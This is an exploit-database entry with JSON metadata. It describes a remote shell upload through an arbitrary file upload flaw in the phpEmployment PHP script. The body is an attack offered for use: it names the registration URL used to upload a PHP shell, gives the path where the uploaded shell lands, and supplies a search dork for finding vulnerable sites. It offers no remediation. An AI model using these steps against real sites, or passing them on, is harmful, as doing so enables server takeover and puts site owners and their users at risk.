ID 1337DAY-ID-4534
Type zdt
Reporter ahmadbady
Modified 2008-12-23T00:00:00
Description
Exploit for unknown platform in category web applications
==============================================================
phpEmployment (php upload) Arbitrary File Upload Vulnerability
==============================================================
****(remote shell upload)****
script: phpEmployment
***************************************************************************
download from:http://www.w2b.ru/download/phpEmployment.zip
***************************************************************************
www.site.com/path/auth.php?mode=regnew&adtype=job
shell: www.site.com/path/photoes/number_shell.php
----------------------------------------------------------------------------------------
dork:"powered by phpEmployment"
------------------------------------------------------------------------------------------
**************************************************
# 0day.today [2018-03-10] #
{"published": "2008-12-23T00:00:00", "id": "1337DAY-ID-4534", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-03-10T04:08:31", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:8F656AF341505CA4322427DF6750F18D", "THREATPOST:50024E22878A8C22037729118244C28D", "THREATPOST:C68678C2E68F154BE808E2BA1132C0C9", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:C1D3381609CA0D4B93469EDA403CB68E", "THREATPOST:BD7F094F9E39A7E7C41B12FDA60A8D2D", "THREATPOST:B6EF7C44A8FDFF63424B9A7DCF9A21BF", "THREATPOST:6C8532DA230FF6FEF3B6B7BEA5E8F2DD", "THREATPOST:05C83E488D9CF5E71AD1F4F7018EA8B9"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/FORTINET_SSL_VPN", "MSF:AUXILIARY/ADMIN/HTTP/WP_GDPR_COMPLIANCE_PRIVESC", "MSF:EXPLOIT/MULTI/HTTP/WP_DB_BACKUP_RCE", "MSF:AUXILIARY/SCANNER/HTTP/DICOOGLE_TRAVERSAL", "MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD"]}], "modified": "2018-03-10T04:08:31", "rev": 2}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-03-10T04:08:31", "edition": 2, "title": "phpEmployment (php upload) Arbitrary File Upload Vulnerability", "href": "https://0day.today/exploit/description/4534", "modified": "2008-12-23T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/4534", "references": [], "reporter": "ahmadbady", "sourceData": "==============================================================\r\nphpEmployment (php upload) Arbitrary File Upload Vulnerability\r\n==============================================================\r\n\r\n\r\n****(remote shell upload)****\r\n\r\nscript: phpEmployment\r\n \r\n***************************************************************************\r\ndownload from:http://www.w2b.ru/download/phpEmployment.zip\r\n \r\n***************************************************************************\r\nwww.site.com/path/auth.php?mode=regnew&adtype=job\r\n\r\nshell: www.site.com/path/photoes/number_shell.php\r\n\r\n----------------------------------------------------------------------------------------\r\ndork:\"powered by phpEmployment\"\r\n------------------------------------------------------------------------------------------ \r\n**************************************************\r\n\r\n\r\n\n# 0day.today [2018-03-10] #"}
{}